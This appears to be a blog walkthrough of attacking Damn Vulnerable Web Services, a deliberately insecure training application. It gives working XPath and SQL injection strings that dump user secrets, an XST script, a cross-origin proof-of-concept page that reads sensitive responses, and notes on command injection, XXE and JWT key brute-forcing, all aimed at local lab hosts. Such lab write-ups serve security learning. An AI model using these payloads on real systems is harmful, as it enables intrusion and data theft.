Installation

Damn Vulnerable Web Services (DVWS) is a vulnerable web application that has various insecure web service elements. It provides a platform for learning about real-world web service vulnerabilities.

https://github.com/snoopysecurity/dvws

WSDL Enumeration

You can find the vulnerable component, service.php, by spidering DVWS using Burp Suite.

The SOAP service processes requests including _check_user_information_, _owasp_apitop10_, _population_ and _return_price_.

XPATH Injection

User Login:

1

1' or '1'='1

User Password:

1

1' or '1'='1

Command Injection

Original Request

Initially, the parameter value of _name_ is set to “find”.

Edited Request

By changing the parameter value of _name_ from “find” to “dir”, we can observe a different response.

Cross Site Tracing (XST)

DVWS indicates a vulnerability with the message “The NuSOAP Library service is vulnerable to a Cross-site scripting flaw.” Exploit DB provides a published exploit: (https://www.exploit-db.com/exploits/34565/)

Note: We modified the source code at \dvws\vulnerabilities\xst\xst.php because of an issue with cookie creation. The following code snippet was moved to the beginning of xst.php:

As noted by DVWS, the vulnerable page is /dvws/vulnerabilities/wsdlenum/service.php/

The following payload was used to carry out the XST attack:

1
2
3
4
5

 var req = new XMLHttpRequest();
 req.open('GET', 'http://localhost/dvws/vulnerabilities/xst/xst.php',false);
 req.send();
 result=req.responseText;
 alert(result); 

URL:
http://localhost/dvws/vulnerabilities/wsdlenum/service.php/var req = new XMLHttpRequest();req.open(‘GET’, ‘http://localhost/dvws/vulnerabilities/xst/xst.php’,false);req.send();result=req.responseText;alert(result);

Changing the GET method to a TRACK method yields the following:

This results in cookie information disclosure.

The article “Penetration Testing with OWASP Top 10 - 2017 A7 Cross-Site Scripting (XSS)” provides a more in-depth look at XST.

REST API SQL Injection

1

2 or 1=1

Extract Information

1
2

2 UNION SELECT 1,2
2 UNION SELECT database(),@@datadir

Extract Table Name

1

2 union select group_concat(table_name),database() from information_schema.tables where table_schema = 'dvws'--

Extract Column Name

1

2 union select group_concat(column_name),database() from information_schema.columns where table_schema='dvws' and table_name='users'--

Dump Data From Extracted Table and Column Names

1

2 union select id, secret from users--

For a deeper dive into SQL Injection, refer to the article “_ Penetration Testing with OWASP Top 10 - 2017 A1 Injection_.”

XML External Entity 2

1
2
3

 ]>

 &systemEntity; 

Request

Response

JSON Web Token (JWT) Secret Key Brute Force

The correct secret key, 1234567890, has been successfully identified.

Same Origin Method Execution (SOME)

Cross-Origin Resource Sharing (CORS)

Checking for Arbitrary Origin Trust

Request

The Origin request header is modified to “http://xyz.com”.

Response

The response shows that the application permits access from all domains (including the arbitrary origin http://xyz.com).

The presence of the Access-Control-Allow-Credentials: true response header indicates that unauthorized third-party websites might be able to execute privileged operations and access sensitive data.

Content of cors_poc.html

1
2
3
4
5
6
7
8
9

 var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
       document.getElementById("secret").innerHTML = this.responseText;
    }
  };
  xhttp.open("POST", "https://192.168.24.2/dvws/vulnerabilities/cors/server.php", true);
  xhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
  xhttp.send(JSON.stringify({"searchterm":"secretword:one"})); 

Request

Response

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVWZDD0nOsM2CYCrtQajPhOT16sgofIDHUfMaOOZGYmG-AUjPlcE7BrBUMo8-eWHNvr85Lkf